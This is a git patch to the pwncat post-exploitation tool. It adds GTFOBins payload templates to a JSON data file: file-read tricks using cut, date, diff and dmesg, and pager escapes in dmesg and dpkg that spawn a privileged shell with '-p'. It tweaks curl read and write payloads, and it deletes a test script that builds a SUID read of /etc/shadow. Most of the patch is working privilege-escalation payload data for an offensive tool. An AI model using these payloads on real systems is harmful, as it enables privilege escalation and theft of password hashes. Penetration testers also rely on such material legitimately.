From 0ce067ada9fac93a401e91c9e004a1c760d6632b Mon Sep 17 00:00:00 2001 From: John Hammond Date: Thu, 14 May 2020 23:19:40 -0400 Subject: [PATCH] Added GTFObins cut, date, diff, dmesg, dpkg --- data/gtfobins.json | 63 ++++++++++++++++++++++++++++++++++++++--- gtfobinstest.py | 40 -------------------------- pwncat/commands/base.py | 2 +- 3 files changed, 60 insertions(+), 45 deletions(-) delete mode 100644 gtfobinstest.py diff --git a/data/gtfobins.json b/data/gtfobins.json index b36eb5e..c78da58 100644 --- a/data/gtfobins.json +++ b/data/gtfobins.json @@ -110,7 +110,7 @@ }, { "type": "read", - "stream": "print", + "stream": "raw", "payload": "{command} -c '{cat} {lfile}'", "suid": ["-p"], "exit": "{ctrl_d}" @@ -465,8 +465,8 @@ { "type": "read", "stream": "base64", - "payload": "{command}", - "args": ["-s", "file://{lfile} --output - | {base64} -w 0"] + "payload": "{command} | {base64} -w 0", + "args": ["-s", "file://{lfile} --output -"] }, { "type": "write", @@ -485,8 +485,63 @@ "type": "write", "stream": "base64", "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF", - "args": ["-s", "file://$TF --output {lfile}"], + "args": ["-s", "file://$TF", "--output", "{lfile}"], "exit": "{ctrl_d}" } + ], +//------------------------------------------------------------------- + "cut": [ + { + "type": "read", + "stream": "print", + "payload": "{command}", + "args": ["-d", "''", "-f1", "{lfile}"] + } + ], +//------------------------------------------------------------------- + "date": [ + { + // This is a janky reader that relies on cut to fully carve out the output. + "type": "read", + "stream": "print", + "payload": "{command} | {cut} -d \":\" -f2- | while read line; do echo ${{line:14:-1}}; done", + "args": ["-f", "{lfile}", "+\"%M%M%M%M%M%M\"", "2>&1"] + } + ], +//------------------------------------------------------------------- + "diff": [ + { + "type": "read", + "stream": "print", + "payload": "{command}", + "args": ["--line-format=%L", "/dev/null", "{lfile}"] + } + ], +//------------------------------------------------------------------- + "dmesg": [ + { + "type": "shell", + "payload": "{command}", + "args": ["-H"], + "input": "!{shell} -p\n", + "exit": "exit\nq\n" + }, + { + "type": "read", + "stream": "print", + "payload": "{command}", + "args": ["-rF", "{lfile}"] + } + ], +//------------------------------------------------------------------- + "dpkg": [ + { + "type": "shell", + "payload": "{command}", + "args": ["-l"], + "input": "!{shell} -p\n", + "exit": "exit\nq\n" + } ] + } \ No newline at end of file diff --git a/gtfobinstest.py b/gtfobinstest.py deleted file mode 100644 index 24f1441..0000000 --- a/gtfobinstest.py +++ /dev/null @@ -1,40 +0,0 @@ -#!/usr/bin/env python3 - - -from pwncat.gtfobins import * -import subprocess - - -def which(path: str, quote=False): - try: - output = subprocess.check_output(f"which {path}", shell=True) - except subprocess.CalledProcessError: - return None - - return output.decode("utf-8").strip() - - -gtfo = GTFOBins("data/gtfobins.json", which) - - -binary_to_test = "curl" -# capabilities_to_test = Capability.SHELL -capabilities_to_test = Capability.WRITE -# capabilities_to_test = Capability.WRITE -our_shell = "/bin/bash" - -binary = gtfo.find_binary(binary_to_test) -print(binary) -print(vars(binary)) - -methods = binary.iter_methods( - which(binary_to_test), caps=capabilities_to_test, stream=None -) -for method in methods: - # print(method) - # print(method.build(shell=our_shell, suid=True)) - print(method.build(lfile="/etc/shadow", suid=True)[0]) - # print(method.build(lfile="/tmp/test", data="hello")[0]) - -# all_binaries = list(gtfo.iter_methods(Capability.SHELL)) -# print(all_binaries[0].build(shell="/bin/bash", suid=True)) diff --git a/pwncat/commands/base.py b/pwncat/commands/base.py index 510fda8..c1b91b6 100644 --- a/pwncat/commands/base.py +++ b/pwncat/commands/base.py @@ -26,7 +26,7 @@ class StoreConstOnce(argparse.Action): def __call__(self, parser, namespace, values, option_string=None): if hasattr(self, "__" + self.dest + "_seen"): raise argparse.ArgumentError(self, "only one action may be specified") - setattr(self, "__" + self.dest + "_seen", True) + setattr(namespace, "__" + self.dest + "_seen", True) setattr(namespace, self.dest, self.const)